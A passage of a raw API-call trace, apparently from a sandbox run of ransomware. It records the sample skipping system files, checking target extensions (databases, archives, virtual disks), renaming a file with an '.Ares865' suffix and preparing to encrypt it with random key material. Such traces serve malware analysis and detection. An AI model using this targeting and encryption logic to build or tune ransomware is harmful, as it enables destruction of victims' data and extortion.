-1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="aoldtz.exe") returned 1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2=".") returned 1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="..") returned 1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="windows") returned -1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="bootmgr") returned 1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="temp") returned -1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="pagefile.sys") returned -1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="boot") returned 1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="ids.txt") returned -1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="ntuser.dat") returned -1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="perflogs") returned -1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="MSBuild") returned -1 [0089.868] lstrlenW (lpString="Help_MValidator.Lck") returned 19 [0089.868] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0089.868] lstrcpyW (in: lpString1=0x2cce472, lpString2="Help_MValidator.Lck" | out: lpString1="Help_MValidator.Lck") returned="Help_MValidator.Lck" [0089.868] lstrlenW (lpString="Help_MValidator.Lck") returned 19 [0089.868] lstrlenW (lpString="Ares865") returned 7 [0089.868] lstrcmpiW (lpString1="tor.Lck", lpString2="Ares865") returned 1 [0089.868] lstrlenW (lpString=".dll") returned 4 [0089.868] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2=".dll") returned 1 [0089.868] lstrlenW (lpString=".lnk") returned 4 [0089.868] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2=".lnk") returned 1 [0089.868] lstrlenW (lpString=".ini") returned 4 [0089.868] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2=".ini") returned 1 [0089.868] lstrlenW (lpString=".sys") returned 4 [0089.868] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2=".sys") returned 1 [0089.868] lstrlenW (lpString="Help_MValidator.Lck") returned 19 [0089.868] lstrlenW (lpString="bak") returned 3 [0089.868] lstrcmpiW (lpString1="Lck", lpString2="bak") returned 1 [0089.868] lstrlenW (lpString="ba_") returned 3 [0089.868] lstrcmpiW (lpString1="Lck", lpString2="ba_") returned 1 [0089.868] lstrlenW (lpString="dbb") returned 3 [0089.868] lstrcmpiW (lpString1="Lck", lpString2="dbb") returned 1 [0089.868] lstrlenW (lpString="vmdk") returned 4 [0089.868] lstrcmpiW (lpString1=".Lck", lpString2="vmdk") returned -1 [0089.868] lstrlenW (lpString="rar") returned 3 [0089.868] lstrcmpiW (lpString1="Lck", lpString2="rar") returned -1 [0089.868] lstrlenW (lpString="zip") returned 3 [0089.868] lstrcmpiW (lpString1="Lck", lpString2="zip") returned -1 [0089.868] lstrlenW (lpString="tgz") returned 3 [0089.868] lstrcmpiW (lpString1="Lck", lpString2="tgz") returned -1 [0089.868] lstrlenW (lpString="vbox") returned 4 [0089.868] lstrcmpiW (lpString1=".Lck", lpString2="vbox") returned -1 [0089.868] lstrlenW (lpString="vdi") returned 3 [0089.868] lstrcmpiW (lpString1="Lck", lpString2="vdi") returned -1 [0089.868] lstrlenW (lpString="vhd") returned 3 [0089.868] lstrcmpiW (lpString1="Lck", lpString2="vhd") returned -1 [0089.868] lstrlenW (lpString="vhdx") returned 4 [0089.868] lstrcmpiW (lpString1=".Lck", lpString2="vhdx") returned -1 [0089.868] lstrlenW (lpString="avhd") returned 4 [0089.869] lstrcmpiW (lpString1=".Lck", lpString2="avhd") returned -1 [0089.869] lstrlenW (lpString="db") returned 2 [0089.869] lstrcmpiW (lpString1="ck", lpString2="db") returned -1 [0089.869] lstrlenW (lpString="db2") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="db2") returned 1 [0089.869] lstrlenW (lpString="db3") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="db3") returned 1 [0089.869] lstrlenW (lpString="dbf") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="dbf") returned 1 [0089.869] lstrlenW (lpString="mdf") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="mdf") returned -1 [0089.869] lstrlenW (lpString="mdb") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="mdb") returned -1 [0089.869] lstrlenW (lpString="sql") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="sql") returned -1 [0089.869] lstrlenW (lpString="sqlite") returned 6 [0089.869] lstrcmpiW (lpString1="or.Lck", lpString2="sqlite") returned -1 [0089.869] lstrlenW (lpString="sqlite3") returned 7 [0089.869] lstrcmpiW (lpString1="tor.Lck", lpString2="sqlite3") returned 1 [0089.869] lstrlenW (lpString="sqlitedb") returned 8 [0089.869] lstrcmpiW (lpString1="ator.Lck", lpString2="sqlitedb") returned -1 [0089.869] lstrlenW (lpString="xml") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="xml") returned -1 [0089.869] lstrlenW (lpString="$er") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="$er") returned 1 [0089.869] lstrlenW (lpString="4dd") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="4dd") returned 1 [0089.869] lstrlenW (lpString="4dl") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="4dl") returned 1 [0089.869] lstrlenW (lpString="^^^") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="^^^") returned 1 [0089.869] lstrlenW (lpString="abs") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="abs") returned 1 [0089.869] lstrlenW (lpString="abx") returned 3 [0089.869] lstrcmpiW (lpString1="Lck", lpString2="abx") returned 1 [0089.869] lstrlenW (lpString="accdb") returned 5 [0089.869] lstrcmpiW (lpString1="r.Lck", lpString2="accdb") returned 1 [0089.869] lstrlenW (lpString="accdc") returned 5 [0089.869] lstrcmpiW (lpString1="r.Lck", lpString2="accdc") returned 1 [0089.870] lstrlenW (lpString="accde") returned 5 [0089.870] lstrcmpiW (lpString1="r.Lck", lpString2="accde") returned 1 [0089.870] lstrlenW (lpString="accdr") returned 5 [0089.870] lstrcmpiW (lpString1="r.Lck", lpString2="accdr") returned 1 [0089.870] lstrlenW (lpString="accdt") returned 5 [0089.870] lstrcmpiW (lpString1="r.Lck", lpString2="accdt") returned 1 [0089.870] lstrlenW (lpString="accdw") returned 5 [0089.870] lstrcmpiW (lpString1="r.Lck", lpString2="accdw") returned 1 [0089.870] lstrlenW (lpString="accft") returned 5 [0089.870] lstrcmpiW (lpString1="r.Lck", lpString2="accft") returned 1 [0089.870] lstrlenW (lpString="adb") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="adb") returned 1 [0089.870] lstrlenW (lpString="adb") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="adb") returned 1 [0089.870] lstrlenW (lpString="ade") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="ade") returned 1 [0089.870] lstrlenW (lpString="adf") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="adf") returned 1 [0089.870] lstrlenW (lpString="adn") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="adn") returned 1 [0089.870] lstrlenW (lpString="adp") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="adp") returned 1 [0089.870] lstrlenW (lpString="alf") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="alf") returned 1 [0089.870] lstrlenW (lpString="ask") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="ask") returned 1 [0089.870] lstrlenW (lpString="btr") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="btr") returned 1 [0089.870] lstrlenW (lpString="cat") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="cat") returned 1 [0089.870] lstrlenW (lpString="cdb") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="cdb") returned 1 [0089.870] lstrlenW (lpString="ckp") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="ckp") returned 1 [0089.870] lstrlenW (lpString="cma") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="cma") returned 1 [0089.870] lstrlenW (lpString="cpd") returned 3 [0089.870] lstrcmpiW (lpString1="Lck", lpString2="cpd") returned 1 [0089.870] lstrlenW (lpString="dacpac") returned 6 [0089.870] lstrcmpiW (lpString1="or.Lck", lpString2="dacpac") returned 1 [0089.871] lstrlenW (lpString="dad") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dad") returned 1 [0089.871] lstrlenW (lpString="dadiagrams") returned 10 [0089.871] lstrcmpiW (lpString1="idator.Lck", lpString2="dadiagrams") returned 1 [0089.871] lstrlenW (lpString="daschema") returned 8 [0089.871] lstrcmpiW (lpString1="ator.Lck", lpString2="daschema") returned -1 [0089.871] lstrlenW (lpString="db-journal") returned 10 [0089.871] lstrcmpiW (lpString1="idator.Lck", lpString2="db-journal") returned 1 [0089.871] lstrlenW (lpString="db-shm") returned 6 [0089.871] lstrcmpiW (lpString1="or.Lck", lpString2="db-shm") returned 1 [0089.871] lstrlenW (lpString="db-wal") returned 6 [0089.871] lstrcmpiW (lpString1="or.Lck", lpString2="db-wal") returned 1 [0089.871] lstrlenW (lpString="dbc") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dbc") returned 1 [0089.871] lstrlenW (lpString="dbs") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dbs") returned 1 [0089.871] lstrlenW (lpString="dbt") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dbt") returned 1 [0089.871] lstrlenW (lpString="dbv") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dbv") returned 1 [0089.871] lstrlenW (lpString="dbx") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dbx") returned 1 [0089.871] lstrlenW (lpString="dcb") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dcb") returned 1 [0089.871] lstrlenW (lpString="dct") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dct") returned 1 [0089.871] lstrlenW (lpString="dcx") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dcx") returned 1 [0089.871] lstrlenW (lpString="ddl") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="ddl") returned 1 [0089.871] lstrlenW (lpString="dlis") returned 4 [0089.871] lstrcmpiW (lpString1=".Lck", lpString2="dlis") returned -1 [0089.871] lstrlenW (lpString="dp1") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dp1") returned 1 [0089.871] lstrlenW (lpString="dqy") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dqy") returned 1 [0089.871] lstrlenW (lpString="dsk") returned 3 [0089.871] lstrcmpiW (lpString1="Lck", lpString2="dsk") returned 1 [0089.871] lstrlenW (lpString="dsn") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="dsn") returned 1 [0089.872] lstrlenW (lpString="dtsx") returned 4 [0089.872] lstrcmpiW (lpString1=".Lck", lpString2="dtsx") returned -1 [0089.872] lstrlenW (lpString="dxl") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="dxl") returned 1 [0089.872] lstrlenW (lpString="eco") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="eco") returned 1 [0089.872] lstrlenW (lpString="ecx") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="ecx") returned 1 [0089.872] lstrlenW (lpString="edb") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="edb") returned 1 [0089.872] lstrlenW (lpString="epim") returned 4 [0089.872] lstrcmpiW (lpString1=".Lck", lpString2="epim") returned -1 [0089.872] lstrlenW (lpString="fcd") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fcd") returned 1 [0089.872] lstrlenW (lpString="fdb") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fdb") returned 1 [0089.872] lstrlenW (lpString="fic") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fic") returned 1 [0089.872] lstrlenW (lpString="flexolibrary") returned 12 [0089.872] lstrcmpiW (lpString1="alidator.Lck", lpString2="flexolibrary") returned -1 [0089.872] lstrlenW (lpString="fm5") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fm5") returned 1 [0089.872] lstrlenW (lpString="fmp") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fmp") returned 1 [0089.872] lstrlenW (lpString="fmp12") returned 5 [0089.872] lstrcmpiW (lpString1="r.Lck", lpString2="fmp12") returned 1 [0089.872] lstrlenW (lpString="fmpsl") returned 5 [0089.872] lstrcmpiW (lpString1="r.Lck", lpString2="fmpsl") returned 1 [0089.872] lstrlenW (lpString="fol") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fol") returned 1 [0089.872] lstrlenW (lpString="fp3") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fp3") returned 1 [0089.872] lstrlenW (lpString="fp4") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fp4") returned 1 [0089.872] lstrlenW (lpString="fp5") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fp5") returned 1 [0089.872] lstrlenW (lpString="fp7") returned 3 [0089.872] lstrcmpiW (lpString1="Lck", lpString2="fp7") returned 1 [0089.873] lstrlenW (lpString="fpt") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="fpt") returned 1 [0089.873] lstrlenW (lpString="frm") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="frm") returned 1 [0089.873] lstrlenW (lpString="gdb") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="gdb") returned 1 [0089.873] lstrlenW (lpString="gdb") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="gdb") returned 1 [0089.873] lstrlenW (lpString="grdb") returned 4 [0089.873] lstrcmpiW (lpString1=".Lck", lpString2="grdb") returned -1 [0089.873] lstrlenW (lpString="gwi") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="gwi") returned 1 [0089.873] lstrlenW (lpString="hdb") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="hdb") returned 1 [0089.873] lstrlenW (lpString="his") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="his") returned 1 [0089.873] lstrlenW (lpString="ib") returned 2 [0089.873] lstrcmpiW (lpString1="ck", lpString2="ib") returned -1 [0089.873] lstrlenW (lpString="idb") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="idb") returned 1 [0089.873] lstrlenW (lpString="ihx") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="ihx") returned 1 [0089.873] lstrlenW (lpString="itdb") returned 4 [0089.873] lstrcmpiW (lpString1=".Lck", lpString2="itdb") returned -1 [0089.873] lstrlenW (lpString="itw") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="itw") returned 1 [0089.873] lstrlenW (lpString="jet") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="jet") returned 1 [0089.873] lstrlenW (lpString="jtx") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="jtx") returned 1 [0089.873] lstrlenW (lpString="kdb") returned 3 [0089.873] lstrcmpiW (lpString1="Lck", lpString2="kdb") returned 1 [0089.873] lstrlenW (lpString="kexi") returned 4 [0089.873] lstrcmpiW (lpString1=".Lck", lpString2="kexi") returned -1 [0089.873] lstrlenW (lpString="kexic") returned 5 [0089.873] lstrcmpiW (lpString1="r.Lck", lpString2="kexic") returned 1 [0089.873] lstrlenW (lpString="kexis") returned 5 [0089.873] lstrcmpiW (lpString1="r.Lck", lpString2="kexis") returned 1 [0089.873] lstrlenW (lpString="lgc") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="lgc") returned -1 [0089.874] lstrlenW (lpString="lwx") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="lwx") returned -1 [0089.874] lstrlenW (lpString="maf") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="maf") returned -1 [0089.874] lstrlenW (lpString="maq") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="maq") returned -1 [0089.874] lstrlenW (lpString="mar") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mar") returned -1 [0089.874] lstrlenW (lpString="marshal") returned 7 [0089.874] lstrcmpiW (lpString1="tor.Lck", lpString2="marshal") returned 1 [0089.874] lstrlenW (lpString="mas") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mas") returned -1 [0089.874] lstrlenW (lpString="mav") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mav") returned -1 [0089.874] lstrlenW (lpString="maw") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="maw") returned -1 [0089.874] lstrlenW (lpString="mdbhtml") returned 7 [0089.874] lstrcmpiW (lpString1="tor.Lck", lpString2="mdbhtml") returned 1 [0089.874] lstrlenW (lpString="mdn") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mdn") returned -1 [0089.874] lstrlenW (lpString="mdt") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mdt") returned -1 [0089.874] lstrlenW (lpString="mfd") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mfd") returned -1 [0089.874] lstrlenW (lpString="mpd") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mpd") returned -1 [0089.874] lstrlenW (lpString="mrg") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mrg") returned -1 [0089.874] lstrlenW (lpString="mud") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mud") returned -1 [0089.874] lstrlenW (lpString="mwb") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="mwb") returned -1 [0089.874] lstrlenW (lpString="myd") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="myd") returned -1 [0089.874] lstrlenW (lpString="ndf") returned 3 [0089.874] lstrcmpiW (lpString1="Lck", lpString2="ndf") returned -1 [0089.874] lstrlenW (lpString="nnt") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="nnt") returned -1 [0089.875] lstrlenW (lpString="nrmlib") returned 6 [0089.875] lstrcmpiW (lpString1="or.Lck", lpString2="nrmlib") returned 1 [0089.875] lstrlenW (lpString="ns2") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="ns2") returned -1 [0089.875] lstrlenW (lpString="ns3") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="ns3") returned -1 [0089.875] lstrlenW (lpString="ns4") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="ns4") returned -1 [0089.875] lstrlenW (lpString="nsf") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="nsf") returned -1 [0089.875] lstrlenW (lpString="nv") returned 2 [0089.875] lstrcmpiW (lpString1="ck", lpString2="nv") returned -1 [0089.875] lstrlenW (lpString="nv2") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="nv2") returned -1 [0089.875] lstrlenW (lpString="nwdb") returned 4 [0089.875] lstrcmpiW (lpString1=".Lck", lpString2="nwdb") returned -1 [0089.875] lstrlenW (lpString="nyf") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="nyf") returned -1 [0089.875] lstrlenW (lpString="odb") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="odb") returned -1 [0089.875] lstrlenW (lpString="odb") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="odb") returned -1 [0089.875] lstrlenW (lpString="oqy") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="oqy") returned -1 [0089.875] lstrlenW (lpString="ora") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="ora") returned -1 [0089.875] lstrlenW (lpString="orx") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="orx") returned -1 [0089.875] lstrlenW (lpString="owc") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="owc") returned -1 [0089.875] lstrlenW (lpString="p96") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="p96") returned -1 [0089.875] lstrlenW (lpString="p97") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="p97") returned -1 [0089.875] lstrlenW (lpString="pan") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="pan") returned -1 [0089.875] lstrlenW (lpString="pdb") returned 3 [0089.875] lstrcmpiW (lpString1="Lck", lpString2="pdb") returned -1 [0089.876] lstrlenW (lpString="pdm") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="pdm") returned -1 [0089.876] lstrlenW (lpString="pnz") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="pnz") returned -1 [0089.876] lstrlenW (lpString="qry") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="qry") returned -1 [0089.876] lstrlenW (lpString="qvd") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="qvd") returned -1 [0089.876] lstrlenW (lpString="rbf") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="rbf") returned -1 [0089.876] lstrlenW (lpString="rctd") returned 4 [0089.876] lstrcmpiW (lpString1=".Lck", lpString2="rctd") returned -1 [0089.876] lstrlenW (lpString="rod") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="rod") returned -1 [0089.876] lstrlenW (lpString="rodx") returned 4 [0089.876] lstrcmpiW (lpString1=".Lck", lpString2="rodx") returned -1 [0089.876] lstrlenW (lpString="rpd") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="rpd") returned -1 [0089.876] lstrlenW (lpString="rsd") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="rsd") returned -1 [0089.876] lstrlenW (lpString="sas7bdat") returned 8 [0089.876] lstrcmpiW (lpString1="ator.Lck", lpString2="sas7bdat") returned -1 [0089.876] lstrlenW (lpString="sbf") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="sbf") returned -1 [0089.876] lstrlenW (lpString="scx") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="scx") returned -1 [0089.876] lstrlenW (lpString="sdb") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="sdb") returned -1 [0089.876] lstrlenW (lpString="sdc") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="sdc") returned -1 [0089.876] lstrlenW (lpString="sdf") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="sdf") returned -1 [0089.876] lstrlenW (lpString="sis") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="sis") returned -1 [0089.876] lstrlenW (lpString="spq") returned 3 [0089.876] lstrcmpiW (lpString1="Lck", lpString2="spq") returned -1 [0089.876] lstrlenW (lpString="te") returned 2 [0089.876] lstrcmpiW (lpString1="ck", lpString2="te") returned -1 [0089.876] lstrlenW (lpString="teacher") returned 7 [0089.876] lstrcmpiW (lpString1="tor.Lck", lpString2="teacher") returned 1 [0089.877] lstrlenW (lpString="tmd") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="tmd") returned -1 [0089.877] lstrlenW (lpString="tps") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="tps") returned -1 [0089.877] lstrlenW (lpString="trc") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="trc") returned -1 [0089.877] lstrlenW (lpString="trc") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="trc") returned -1 [0089.877] lstrlenW (lpString="trm") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="trm") returned -1 [0089.877] lstrlenW (lpString="udb") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="udb") returned -1 [0089.877] lstrlenW (lpString="udl") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="udl") returned -1 [0089.877] lstrlenW (lpString="usr") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="usr") returned -1 [0089.877] lstrlenW (lpString="v12") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="v12") returned -1 [0089.877] lstrlenW (lpString="vis") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="vis") returned -1 [0089.877] lstrlenW (lpString="vpd") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="vpd") returned -1 [0089.877] lstrlenW (lpString="vvv") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="vvv") returned -1 [0089.877] lstrlenW (lpString="wdb") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="wdb") returned -1 [0089.877] lstrlenW (lpString="wmdb") returned 4 [0089.877] lstrcmpiW (lpString1=".Lck", lpString2="wmdb") returned -1 [0089.877] lstrlenW (lpString="wrk") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="wrk") returned -1 [0089.877] lstrlenW (lpString="xdb") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="xdb") returned -1 [0089.877] lstrlenW (lpString="xld") returned 3 [0089.877] lstrcmpiW (lpString1="Lck", lpString2="xld") returned -1 [0089.877] lstrlenW (lpString="xmlff") returned 5 [0089.877] lstrcmpiW (lpString1="r.Lck", lpString2="xmlff") returned -1 [0089.877] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.Ares865") returned 84 [0089.877] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.ares865"), dwFlags=0x1) returned 1 [0089.878] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.879] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4) returned 1 [0089.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.879] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.880] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.880] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.880] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x15c [0089.882] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0089.883] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.883] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.883] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.884] HeapFree (in: hHeap=0x2b0000, 